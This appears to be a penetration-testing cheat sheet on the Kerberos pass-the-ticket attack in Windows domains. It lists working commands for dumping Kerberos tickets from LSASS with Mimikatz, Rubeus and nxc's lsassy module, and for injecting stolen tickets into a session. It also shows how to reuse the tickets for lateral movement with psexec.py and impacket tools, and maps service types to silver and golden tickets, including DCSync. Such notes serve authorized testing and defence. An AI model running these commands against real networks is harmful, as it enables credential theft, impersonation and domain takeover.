Pass The Ticket

It consists of using a Kerberos TGT or TGS ticket to perform authentication. The tickets are extracted by the LSASS process. Require administrator privileges to extract other people's tickets, otherwise only your own can be extracted.

Mimikatz

Ticket Extraction

.\mimikatz.exe 
> privilege::debug
> sekurlsa::tickets /export

File [randomvalue]-username@service-domain.kirbi, krbtgt service is TGT ticket.

Uploading ticket on the current session (like it was a cookie)

> kerberos::ptt "<FILE.kirbi>"

> misc::cmd

Rubeus

Ticket Extraction

Rubeus.exe dump /nowrap 
# printed in base64

Uploading ticket on the current session (like it was a cookie)

Rubeus.exe ptt /ticket:<BASE64_TICKET>

Rubeus.exe ptt /ticket:<FILE.kirbi>  # obtained from mimikatz

Get the TGT and TGS

nxc smb <IP> -u <USER> -p <PASS> -M lsassy

Import one

chmod 600 <USER>.ccache
export KRB5CCNAME=<USER>.ccache
klist

Use with Kerberos authentication (-k) Add HOSTNAME to /etc/hosts

nxc smb <IP_TARGET> --use-kcache --kdcHost <HOSTNAME_DC>
psexec.py -k -no-pass -dc-ip <DC_IP> [-target-ip <IP_TARGET>] <HOSTNAME_TARGET>  # TGT
impacket-smbclient -k -no-pass -dc-ip <DC_IP> <HOSTNAME> # TGS CIFS 
# also with impacket-secretsdump, impacket-wmiexec, etc.

SPN service

Service Type

Service Silver Tickets

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Depending on OS also:

WSMAN

RPCSS

WinRM

HOST

HTTP

In some occasions you can just ask for: WINRM

Scheduled Tasks

HOST

Windows File Share, also psexec

CIFS

LDAP operations, included DCSync

LDAP

Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Golden Tickets

krbtgt

Last updated 12 days ago

hashtagMimikatzarrow-up-right

hashtagRubeusarrow-up-right

hashtagSPN service

Mimikatz

Rubeus

SPN service